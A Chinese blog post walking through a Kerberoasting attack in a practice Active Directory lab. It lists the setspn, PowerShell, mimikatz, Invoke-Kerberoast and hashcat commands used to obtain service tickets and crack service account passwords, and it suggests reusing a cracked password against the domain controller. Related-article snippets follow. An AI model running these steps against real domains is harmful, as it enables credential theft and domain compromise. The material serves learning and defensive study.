域渗透之Kerberoasting

最新推荐文章于 2024-03-11 17:17:57 发布
最新推荐文章于 2024-03-11 17:17:57 发布
阅读量743 收藏 1
点赞数 1
分类专栏: 内网域环境 文章标签: 安全 渗透测试 windows web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nicai321/article/details/122712114
版权

文中主要讲解内网域环境,通过学习掌握域环境,更快知晓内网工作原理。本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。

Kerberoasting

原理:

域内用户去请求域内某个服务资源时,先会通过AS进行身份认证,通过后会返回一个用用户密码hash加密的TGT给用户,用户拿着TGT向TGS去请求,TGS会返回一个用对应服务账号的密码hash加密过的专门用于访问特定服务的服务票据回来,如果返回的票据是一个域账号来运行的,那么我们攻击者就可以利用这张票据中的hash来尝试枚举口令(因为TGS服务票据加密算法已知),模拟加密过程,从而获得明文口令。

漏洞复现:

使用setspn查询域内SPN:

setspn.exe -q */* #查询域内所有带有spn服务
setspn.exe -T redteam.club -q */* #查询指定域内所有带有spn服务

这里我们可以Users的是域用户,Computers的为机器账户
在这里插入图片描述
同样可以使用vbs或powershell脚本来进行检测:

cscript GetUserSPNs.vbs #检测spn

这里也可以看出域用户开启了一个mysql服务:
在这里插入图片描述
给mysql服务注册SPN:

setspn -s mysql/12server4.redteam.club:3306 test #最后就是注册的用户,如果是域管理员注册,同样可以拿到带有hash的TGS去枚举

方式一:用mimikatz脚本枚举:

使用命令,请求指定TGS,然后使用klist来进行查看票据:

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "mysql/12server4.redteam.club:3306"

在这里插入图片描述
这样我们就可以使用mimikatz导出票据:

kerberos::list /export #导出票据

在这里插入图片描述
然后就可以将这个票据使用脚本来进行枚举:

python3 tgsrepcrack.py wordlist.txt mssql.kirbi #前面是枚举的字典,后面是mysql的票据

在这里插入图片描述

方式二:使用hashcat穷举:

使用powershell命令将hashcat导出:

Import-Module .\Invoke-Kerberoast.ps1
Invoke-Kerberoast -OutputFormat Hashcat | Select hash | ConvertTo-CSV -NoTypeInformation

在这里插入图片描述
将文件中的这一段使用hashcat工具进行穷举:

hashcat -m 13100 hash.txt passwd.txt -o found.txt --force #前面是导出的hash,中间是字典,如果有匹配的就会将明文密码导出found.txt

在这里插入图片描述
这里就可以看出密码为:pass@123
我们就可以拿这个密码去尝试域控的,因为有的时候,密码是一样的;这文件前面是test,如果前面显示的administrator,那这就可能是域控密码。

全局变量Global
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Kerberoasting——渗透
include_voidmain的博客
03-30 404
0x01 前言 前一阵刚刚写了kerberos协议的原理,就是为了给后续的几篇文章做一下铺垫,保证大家都能看懂,尽量以简要的话术来描述,欢迎翻阅前面的文章进行查看。 0x02 Kerberoasting Kerberoasting 是一种在请求访问服务时利用 Kerberos 协议中的弱点的技术。 首先会看以下kerberos认证的流程: Client想要访问Server的服务时,先要向AS发送能够证明自己身份的验证 验证通过后AS会给Client发送一个TGT 随后Client再向TGS去验证
Kerberoasting攻击
无心的博客
09-28 3071
前面我们介绍了《Windows本地认证》、《Windows网络认证》、《Windows认证》和《SPN扫描》,这次继续讲解内相关的东西。 0x01介绍 当发布Windows 2000和Active Directory时,微软打算在 Windows NT 和Windows 95 上也支持Active Directory,这意味着不仅会产生各种各样的安全问题也会导致更多不安全的配置方式。同时,也意...
Kerberoasting学习
mingyqf的博客
02-24 822
Author: Shu1L Link: https://shu1l.github.io/2020/08/05/kerberosating-gong-ji-xue-xi/ 前言 Kerberoasting攻击是Tim Medin在DerbyCon 2014 上发布的一种口令攻击方法,Tim Medin同时发布了 配套的攻击工具kerberoast。此后,不少研究人员对Ker beroasting进行了改进和扩展,在GitHub上开发发布了 大量工具,使得Kerberoasting逐渐发展成为攻击的常用方法
Kerberoast/Kerberoasting:攻击与检测
Ping_Pig的博客
10-21 2182
讲在前面: Kerberoasting攻击手法在渗透中是必不可缺的一项手法,它可以帮助你利用普通用户的权限在AD中提取到服务账户的凭据,又因为一般的服务账户密码策略可能较为薄弱或密码设置为永不过期等等。所以当攻击者拿到服务凭据后,花不了多大功夫就将其暴力破解了。 注意: Windows系统默认的服务已经映射到AD中的计算机账户中,该类账户具有关联的128个字符的密码,破解起来相对费劲。 针对这个问题我们需要了解如下两个协议,当然在这里我们只能简单的介绍,笔者参考了如下几篇优秀的论文以帮助您来了解K
Kerberos协议分析及服务器配置以及黄金白银票据攻击复现
nopants的博客
06-16 999
服务器搭建以及用户加入服务器及黄金白银票据攻击的验证复现
渗透之流量劫持
02-01
windowsDomain中文翻译为既是Windows网络操作系统的逻辑组织单元,也是...在网络渗透攻击中,攻击者如果获取了的权限,那么攻击者就有可能获取公司的机密,控制公司的一切。所以安全是企业安全最为核心的一个
内网渗透渗透.pdf
08-07
目录 工作组& 渗透姿势 MS14-068 致谢
渗透完全技巧.pdf
10-03
渗透】是针对Windows环境进行的一种高级攻击技术,目的是控制控制器,从而获取整个网络的控制权。【内网横向】是指在获得初步权限后,在内网中进一步扩散影响力,【权限维持】则是指在成功入侵后保持长期的...
hackthebox - active (考点: smb 利用 & kerberoasting
冬萍子癸水
05-11 619
1 扫描 nmap常规扫,88的kerberos想到,跟hackthebox这台考的靶机forest 有类似处了。139&445想到smb利用。389 ldap想到可能有ldap扫描。 389提示domian是active.htb。我们也先把自己的/etc/hostsdns地址加上10.10.10.100 active.htb方便可能的关联。 Not shown: 986 closed ports PORT STATE SERVICE VERSION 88/tcp o
深入理解 Kerberoasting 攻击
最新发布
qq_31812157的博客
03-11 572
是一种允许攻击者窃取使用RC4加密的KRB_TGS票证的技术,以暴力破解应用程序服务HASH来获取其密码Kerberos使用所请求服务的NTLM哈希来加密给定服务主体名称 (SPN) 的KRB_TGS票证。当用户向控制器KDC发送针对已注册SPN的任何服务的TGS 票证请求时,KDC会生成KRB_TGS攻击者可以离线使用例如hashcat来暴力破解服务帐户的密码,因为该票证已使用服务帐户的NTLM 哈希进行了加密。Kerberoasting攻击主要步骤如下1.发现SPN服务。
渗透-Kerberoasting Attack
whojoe的博客
05-28 561
渗透-Kerberoasting Attack一、概述二、Kerberoasting攻击流程三、请求服务票据PowershellmimikatzGetUserSPNs查看票据是否申请成功klistMimikatzMSFRiskySPN导出票据mimikatzkerberoastGet-TGSCipher破解票据重写服务票据&RAM注入后门利用参考文章 一、概述 黑客可以使用有效的用户的身份验证票证(TGT)去请求运行在服务器上的一个或多个目标服务的服务票证。DC在活动目录中查找SPN,并使用与S
内网渗透:详解kerberoast攻击
A_991128a的博客
07-29 456
上篇文章介绍了kerberos的协议的认证流程以及可能出现的安全问题,也简要说了一下kerberoast攻击,本篇文章就具体介绍一下kerberoasting具体原理以及如何进行操作。关于内网相关的文章已经发了两篇了,大家感兴趣的话可以找以前的文章看一下,后面会继续出关于内网方面的知识。内网渗透:Kerberos认证协议安全性分析内网横移:抓取管理员密码首先再来回顾一下Kerberoast协议的认证过程。kerberoast认证过程算上PAC可以说有四个个阶段。如下图所示。
Kerberoast攻击的另一种姿势
weixin_34293911的博客
09-20 208
本文讲的是Kerberoast攻击的另一种姿势,大约在两年前,Tim Medin提出了一种新的攻击技术,他称之为“Kerberoasting”。尽管在这种攻击技术发布时我们还没有意识到其全部的含义,但这种攻击技术已经改变了我们的交战游戏。最近,Kerberoasting受到越来越多的关注,@mubix发布了以Kerberoasting为主题的三篇连载系列...
内网渗透(二) | 渗透Kerberoast攻击
Ms08067安全实验室
05-09 2933
Kerberoast攻击kerberoast攻击发生在kerberos协议的TGS_REP阶段,关于kerberos协议详情,传送门:内网渗透 | 内认证之Kerberos协议详解Ke...
setspn
wzg1101的专栏
04-02 2904
要使用 Kerberos 身份验证,某种服务必须注册其名称(称为服务主体名称 (SPN)),以及运行该服务所使用的帐户。默认情况下,Active Directory® 目录服务注册 NetBIOS 或者计算机名,并允许计算机帐户使用 Kerberos。如果要以不同帐户或使用不同名称(例如,如果计算机使用其他的 WINS 或 DNS 名)运行服务,那么您可以使用 Setspn.exe 命令行工具设置...
adfs服务器获取信息失败,授权给adfs读取ad 在ad服务器上运行 - setspn 命令 -摘自网络...
weixin_28744423的博客
08-06 412
Because the application pool identity for the AD FS 2.0 AppPool is running as a domain user/service account, you must configure the Service Principal Name (SPN) for that account in the domain with the...
【内网学习笔记】24、SPN 的应用
TeamsSix 的 CSDN 空间
09-07 1189
0、前言 SPN Windows 环境是基于微软的活动目录服务工作的,它在网络系统环境中将物理位置分散、所属部门不同的用户进行分组和集中资源,有效地对资源访问控制权限进行细粒度的分配,提高了网络环境的安全性及网络资源统一分配管理的便利性。 在环境中运行的大量应用包含了多种资源,为了对资源的合理分类和再分配提供便利,微软给内的每种资源分配了不同的服务主题名称即 SPN (Service Principal Name) Kerberos Kerberos 是由 MIT 提出的一种网络身份验证协议,旨在通过
Setspn.exe
缘起宇轩阁
01-30 8549
下面是使用 Setspn.exe 命令行实用程序的基本语法,其中“accountname”可以是单独的名称,也可以是/名称。 setspn [parameter] accountname Setspn.exe 可以使用下列参数: 参数 功能 示例 -R 重置 HOSTServicePrincipalName。 setspn -R computername -A 添加任意的 SPNsetspn -A SPN computern
渗透技术详解
"渗透.pdf 是一份关于网络安全中的渗透技术的文档,主要涵盖了进行渗透时常用的基础命令和操作。文档详细列举了多个Windows系统管理命令,这些命令环境中用于信息收集、权限提升和信任关系分析,是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

全局变量Global

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值